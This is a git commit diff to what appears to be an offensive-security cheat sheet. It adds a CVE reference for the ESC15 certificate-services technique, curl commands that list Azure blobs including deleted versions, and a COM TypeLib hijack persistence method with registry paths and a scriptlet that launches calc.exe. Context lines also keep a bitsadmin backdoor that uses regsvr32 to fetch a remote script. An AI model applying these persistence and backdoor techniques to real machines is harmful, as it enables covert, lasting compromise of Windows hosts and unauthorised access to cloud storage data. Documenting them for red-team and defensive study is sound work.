COM Persistence + EKUwu CVE + Deleted Blobs from Azure Storage

main
Swissky 2024-11-14 13:15:04 +01:00
parent bb0b447d12
commit ea7e265dac
3 changed files with 78 additions and 2 deletions

View File

@ -423,7 +423,10 @@ Members : {}
``` ```
## ESC15 - EKUwu Application Policies ## ESC15 - EKUwu Application Policies - CVE-2024-49019
This technique now has a CVE number and was patched on November 12, See [Active Directory Certificate Services Elevation of Privilege Vulnerability - CVE-2024-49019](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49019) for more information.
**Requirements** **Requirements**

View File

@ -17,6 +17,40 @@ Found Storage Account - redacted.blob.core.windows.net
## List and download blobs ## List and download blobs
Visiting `https://<storage-name>.blob.core.windows.net/<storage-container>?restype=container&comp=list` provides a JSON file containing a complete list of the Azure Blobs.
```xml
<EnumerationResults ContainerName="https://<storage-name>.blob.core.windows.net/<storage-container>">
<Blobs>
<Blob>
<Name>index.html</Name>
<Url>https://<storage-name>.blob.core.windows.net/<storage-container>/index.html</Url>
<Properties>
<Last-Modified>Fri, 20 Oct 2023 20:08:20 GMT</Last-Modified>
<Etag>0x8DBD1A84E6455C0</Etag>
<Content-Length>782359</Content-Length>
<Content-Type>text/html</Content-Type>
<Content-Encoding/>
<Content-Language/>
<Content-MD5>JSe+sM+pXGAEFInxDgv4CA==</Content-MD5>
<Cache-Control/>
<BlobType>BlockBlob</BlobType>
<LeaseStatus>unlocked</LeaseStatus>
</Properties>
</Blob>
```
Browse deleted files.
```ps1
$ curl -s -H "x-ms-version: 2019-12-12" 'https://<storage-name>.blob.core.windows.net/<storage-container>?restype=container&comp=list&include=versions' | xmllint --format - | grep Name
<EnumerationResults ServiceEndpoint="https://<storage-name>.blob.core.windows.net/" ContainerName="<storage-container>">
<Name>index.html</Name>
<Name>scripts-transfer.zip</Name>
```
```powershell ```powershell
PS Az> Get-AzResource PS Az> Get-AzResource
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME> PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>

View File

@ -242,6 +242,44 @@ bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.1
bitsadmin /resume backdoor bitsadmin /resume backdoor
``` ```
### COM TypeLib
* [CICADA8-Research/TypeLibWalker](https://github.com/CICADA8-Research/TypeLibWalker) - TypeLib persistence technique
Use [sysinternals/procmon](https://learn.microsoft.com/fr-fr/sysinternals/downloads/procmon) to find `RegOpenKey` with the status `NAME NOT FOUND`. The process `explorer.exe` is a good target, as it will spawn your payload every time it is run.
```ps1
Path: HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win32
Path: HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win64
Name: anything
Type: REG_SZ
Value: script:C:\1.sct
```
Example of content for `1.sct`.
```xml
<?xml version="1.0"?>
<scriptlet>
<registration
description="explorer"
progid="explorer"
version="1.0"
classid="{66666666-6666-6666-6666-666666666666}"
remotable="true">
</registration>
<script language="JScript">
<![CDATA[
var WShell = new ActiveXObject("WScript.Shell");
WShell.Run("calc.exe");
]]>
</script>
</scriptlet>
```
## Serviceland ## Serviceland
### IIS ### IIS
@ -623,3 +661,4 @@ Set-DomainObject -Identity <target_machine> -Set @{"ms-mcs-admpwdexpirationtime"
* [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html) * [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html)
* [PrivEsc: Abusing the Service Control Manager for Stealthy & Persistent LPE - 0xv1n - 2023-02-27](https://0xv1n.github.io/posts/scmanager/) * [PrivEsc: Abusing the Service Control Manager for Stealthy & Persistent LPE - 0xv1n - 2023-02-27](https://0xv1n.github.io/posts/scmanager/)
* [Sc sdset - Microsoft - 08/31/2016](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11)) * [Sc sdset - Microsoft - 08/31/2016](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11))
* [Hijack the TypeLib. New COM persistence technique - CICADA8 - October 22, 2024](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)